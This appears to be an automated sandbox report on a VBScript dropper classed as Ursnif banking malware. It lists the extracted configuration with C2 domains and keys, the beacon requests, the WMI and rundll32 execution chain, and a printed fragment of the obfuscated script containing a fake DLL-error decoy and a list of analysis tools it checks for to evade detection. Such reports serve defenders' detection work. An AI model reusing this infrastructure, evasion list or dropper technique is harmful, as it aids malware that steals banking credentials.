Windows Analysis Report start[2021.09.09_15-26].vbs

Overview

General Information

Sample Name: start[2021.09.09_15-26].vbs
Analysis ID: 481181
MD5: 3959f76d91c30f3c14916f80a6c4cf23
SHA1: 2c918bff7f9073762308af3876777afc8507e3a8
SHA256: 1d02060d7493d25e46e7cdf76fc05aa6c80493f40db75d48700f1eb17431191d

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Writes registry values via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

AV Detection:

Found malware configuration
Source: 00000017.00000003.577173150.0000000000B30000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: start[2021.09.09_15-26].vbs Virustotal: Detection: 10%
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/ Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT Avira URL Cloud: Label: malware
Source: http://pop.bigbigpoppa.com/ Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: pop.urlovedstuff.com Virustotal: Detection: 8%
Source: atl.bigbigpoppa.com Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fum.cpp ReversingLabs: Detection: 13%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 23_2_00C23276
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034AC85 FindFirstFileExW, 23_2_7034AC85

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: pop.urlovedstuff.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
Source: global traffic HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Sep 2021 11:52:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000002.733066508.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d
Source: rundll32.exe, 00000017.00000003.651548557.00000000006CF000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT
Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp String found in binary or memory: http://pop.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000003.652840050.00000000006D5000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.697690406.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
Source: global traffic HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 23_2_00C23276

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332274 23_2_70332274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C2725F 23_2_00C2725F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C27E30 23_2_00C27E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C21754 23_2_00C21754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7033F000 23_2_7033F000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70348AA5 23_2_70348AA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70354362 23_2_70354362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034D536 23_2_7034D536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7033F500 23_2_7033F500
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70350770 23_2_70350770
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331382 GetProcAddress,NtCreateSection,memset, 23_2_70331382
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703314FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 23_2_703314FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331B4A NtMapViewOfSection, 23_2_70331B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332495 NtQueryVirtualMemory, 23_2_70332495
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 23_2_00C240DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C28055 NtQueryVirtualMemory, 23_2_00C28055
Java / VBScript file with very long strings (likely obfuscated code)
Source: start[2021.09.09_15-26].vbs Initial sample: Strings found which are bigger than 50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Source: start[2021.09.09_15-26].vbs Virustotal: Detection: 10%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/2@4/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C22102 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 23_2_00C22102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: start[2021.09.09_15-26].vbs Static file information: File size 1393062 > 1048576
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332210 push ecx; ret 23_2_70332219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332263 push ecx; ret 23_2_70332273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C27AB0 push ecx; ret 23_2_00C27AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C27E1F push ecx; ret 23_2_00C27E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70357A3C push ds; iretd 23_2_70357A42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7035922C push edi; ret 23_2_7035922E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70354A03 push ds; retf 0000h 23_2_70354A05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703562A0 push es; ret 23_2_703562B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70359301 push ebp; ret 23_2_70359304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70356B54 pushfd ; iretd 23_2_70356B55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70357CF3 push ecx; retf 23_2_70357CF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7035856E push ebp; retf 23_2_7035856F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70349D56 push esp; retf 23_2_70349D57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70349758 push esp; retf 23_2_70349760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038FF41 push ss; ret 23_2_7038FF5B
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress, 23_2_70331A0A

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
